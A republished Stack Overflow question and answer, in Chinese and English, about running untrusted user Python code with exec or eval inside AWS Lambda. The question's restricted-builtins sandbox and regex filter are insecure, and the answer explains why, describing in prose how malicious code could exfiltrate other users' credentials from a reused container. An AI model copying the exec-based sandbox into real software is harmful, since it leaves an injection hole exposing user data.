使用Exec或Eval在AWS-LAMBDA中运行不受信任的Python代码 [英] Running Untrusted Python Code in AWS-LAMBDA using Exec or Eval

查看:97
本文介绍了使用Exec或Eval在AWS-LAMBDA中运行不受信任的Python代码的处理方法,对大家解决问题具有一定的参考价值,需要的朋友们下面随着小编来一起学习吧!

问题描述

进行了大量研究.我只是一个padawan,但是,我有一个项目,必须在该项目中从网站运行用户的不受信任的Python3代码.

如果这个问题有一些动人之处,我也要提前道歉.

  • 我正在寻找一种尽可能安全的方法.除非存在泄露极其敏感的数据的巨大风险,否则这不一定是100%完美的.

主要问题:

  • 我的 AWS-lambda 计划是否会对泄漏敏感数据带来极大的风险?
  • 我还应该采取其他简单的预防措施来使 AWS-lambda 中的这项工作更安全吗?
  • 是否有办法让 exec()突破 AWS-lambda 容器并进行其他任何网络连接(如果我所连接的仅仅是一个 AWS-api-gateway 用于REST调用吗?
  • 我什至需要限制 __ builtins __ 和本地变量,还是AWS-lambda容器足够安全?

背景

似乎大多数公司使用 Kubernetes Docker容器来执行不受信任的python代码(例如 Leetcode Programiz >或 hackerRank ).

请参阅以下有用链接:

  • 解决方案

    我也对此进行了调查,并对是否可以使用AWS lambda运行不受信任的代码感兴趣.通常,您的逻辑看起来很合理,但是有几件事很重要

    使用正则表达式确保没有人输入双下划线错误的东西

    不要这样做!不可能(或几乎不可能)检查包含python代码的字符串是否是恶意的.想想有人叫你打电话:

      eval(base64.b64decode(b'cHJpbnQoInRoaXMgaXNuJ3QgYmFkLCBidXQgeW91IGRvbid0IGtub3cgdGhhdCEiKQ ==')) 

    那安全吗?正则表达式会被它拾取吗?很好,您可以模拟 eval(),但是接下来呢?我绝对毫不怀疑,有能力的python开发人员可以找到绕过它的路线.

    半安全总比完全不安全

    您将开始信任它,构建依赖于半安全层的另一个功能,最终被黑客入侵.


    解决方案

    1. 使用许多人和大公司所依赖的语言或功能,这样一来,违规的风险就很小了(如果有人确实发现了零日漏洞,那么将有比您更有利可图的人被黑客入侵).如果可以使用Javascript,则可能是一个不错的选择,也可以尝试将pypy或RustPython编译为Web程序集.
    2. 请接受您的代码根本不安全,并依靠OS/PAAS保护您的代码.换句话说,让用户在AWS lambda中运行任意操作,然后让Amazon隔离它.

    我的问题

    我想使用第二个选项,但是我担心开发人员会恶意地污染lambda容器,然后又被另一个成为受害者的无辜开发人员使用.

    假设我们有一个AWS lambda,它可以有效地调用 eval(user_writer_code)并返回结果,它还可以设置一堆环境变量,这些变量可以在 user_writer_code 中引用>.

    lambda阻止他们在调用代码时进行任何恶意操作-例如Lambda用户凭据无法访问任何令人恐惧的内容.他们可以发出请求,耗尽内存,占用CPU,挂起-AWS负责的所有工作.

    但是如何停止以下向量:

    1. 恶意用户执行模拟内置方法的代码,当该方法称为当前代码上下文并且环境变量被发布到某个服务器时.
    2. 无辜的用户在同一个lambda容器上执行他们的代码,AWS lambda巧妙地重用了该过程以提高性能.
    3. 无辜的用户的代码和凭据(环境变量)被发布到恶意用户服务器.

    我想知道是否有人确认一种或另一种方法是否可以防止lambda容器受到这种污染?

    Been doing a ton of research. I am a mere padawan, however, I have a project where I must run a user's untrusted Python3 code from a website.

    I also apologize in advance if this question has some moving parts.

    • I am looking for an as safe as possible approach. This doesn't need to be 100% perfect unless there is a big risk of leaking extremely sensitive data.

    Main questions:

    • Does my AWS-lambda plan run an extreme risk for leaking sensitive data?
    • Are there any other simple precautions that I should take which could make this work safer in AWS-lambda?
    • Are there ways for exec() to break out of the AWS-lambda container and make any other network connections if all I have connected to it is the single AWS-api-gateway for the REST call?
    • Do I even need to limit __builtins__ and locals, or are AWS-lambda containers safe enough?

    BackGround

    It seems most companies use Kubernetes and Docker containers to execute untrusted python code (such a Leetcode, Programiz, or hackerRank).

    See these helpful links:

    My Plan

    I am thinking that I can POST my arbitrary Python code to an AWS Lambda Function as a microservice, using their containerization/scaling rather than build my own. In the Lambda container, I can just run the code through a simple exec or eval function, perhaps with some limitation like this:

    "

    safe_list = ['math','acos', 'asin', 'atan', 'print','atan2', 'ceil', 'cos', 'cosh', 'de grees', 'e', 'exp', 'fabs', 'floor', 'fmod', 'frexp', 'hypot', 'ldexp', 'log', 'log10', 'modf', 'pi', 'pow', 'radians', 'sin', 'sinh', 'sqrt', 'tan', 'tanh'] 
        safe_dict = dict([ (k, locals().get(k, None)) for k in safe_list ]) 
        safe_dict['abs'] = abs
        exec(userCode,{"**__builtins__"**:None},safe_dict )
    

    Special Note:

    • I am not too concerned about infinite loops or crashing things, because I will just timeout and tell the user to try again.
    • All I need to do is run pretty simple python code (generally less than a few lines) and return exceptions, stdout, prints, and run a check on the result. Need to run:
      • Math operators, lists, loops, lambda functions, maps, filters, declare methods, declare classes with properties, print.
    • This doesn't need to be a perfect project for hundreds of thousands of users. I just want to have a live site for a resume booster and maybe make a little money on ads to help with costs.
    • If there are severe limitations, I can eventually implement it in Kubernetes (as in the above link), but hopefully, this solution will work well enough.
    • I just want this to work relatively well and not take too long to build or cost too much money.
    • I do not want to leak any sensitive information.

    Security things I am already planning on doing:

    • AWS lambda: Limit the time out to around 1-2 seconds
    • AWS lambda: Limit the memory usage to 128mb
    • My Own Code: Use regex to make sure no one is passing in double underscores badstuff
    • Keeping this microservice as minimal as possible (only connecting a single AWS-API-gateway).

    Other notes:

    • I don't think I can use restrictedPython or PyPy's sandbox feature in AWS Lambda because I don't have access to those dependencies OOB. I'm hoping that those are not necessary for this use case.
    • If it's impossible to do this with exec(), are there safe python interpreters on GitHub or someplace that I can literally copy-paste into files in AWS-lambda and just call them?
    • I am planning on allowing the user to print from exec with something like this:

    "

    @contextlib.contextmanager
    def stdoutIO(stdout=None):
        old = sys.stdout
        if stdout is None:
            stdout = StringIO()
        sys.stdout = stdout
        yield stdout
        sys.stdout = old
    
        
    with stdoutIO() as s:
        try:
            exec(userCode)
        except:
            print("Something wrong with the code")
    print( s.getvalue())
    print(i)
    

    Please let me know if you have any questions or suggestions.

    ___ Edit ** adding architecture diagram ___

    解决方案

    I'm looking into this too and interested in whether AWS lambda can be used to run untrusted code. Mostly your logic looks reasonable, but a couple of things stick out

    Use regex to make sure no one is passing in double underscores badstuff

    Don't do this! It's impossible (or virtually impossible) to check if a string containing python code is malicious or not. Think of someone asking you to call this:

    eval(base64.b64decode(b'cHJpbnQoInRoaXMgaXNuJ3QgYmFkLCBidXQgeW91IGRvbid0IGtub3cgdGhhdCEiKQ=='))
    

    Is that safe? Is it going to be picked up by a regex? Fine you could mock eval() but what next? I've absolutely no doubt that a half competent python developer could find a route round it.

    Half secure is worse than not secure at all

    You'll start to trust it, build another feature that relies on the semi-secure layer and end up getting hacked.


    Solutions

    1. Use a language or feature that lots of people and big companies rely on, that way the risk of a breach is small (and if someone does find a zero-day vulnerability, there will be someone more profitable to hack than you). Javascript might be a good option here if you can use it, you might also try pypy or RustPython compiled to web assembly.
    2. Accept that your code is not at all secure, and rely on the OS/PAAS to protect you. In other words, let the user run whatever they like in the AWS lambda, and let Amazon isolate it.

    My Problem

    I want to use the second option, but I'm worried about a hostile developers capacity to taint a lambda container, which is then used by another innocent developer who falls victim.

    Let's say we have an AWS lambda that effectively calls eval(user_written_code) and returns the result, it might also set a bunch of environment variables which can be references in user_written_code.

    The lambda prevents them doing anything malicious when the code is called - e.g. the lambda user credentials don't have access to anything scary. They can make requests, use up memory, eat CPU, hang - all that's taken care of by AWS.

    But how do I stop the following vector:

    1. Malicious user executes code which mocks a builtin method, when the method is called the current code context and environment variables are posted to some server.
    2. Innocent user executes their code on the same lambda container, AWS lambda cleverly reuses the process to improve performance.
    3. The innocent user's code and credentials (environment variables) get posted to the malicious users server.

    I'd be interested to know if anyone else has confirmed one way or the other whether there's an effective way to prevent lambda containers getting tainted like this?

    这篇关于使用Exec或Eval在AWS-LAMBDA中运行不受信任的Python代码的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!

查看全文
登录 关闭
扫码关注1秒登录
发送“验证码”获取 | 15天全站免登陆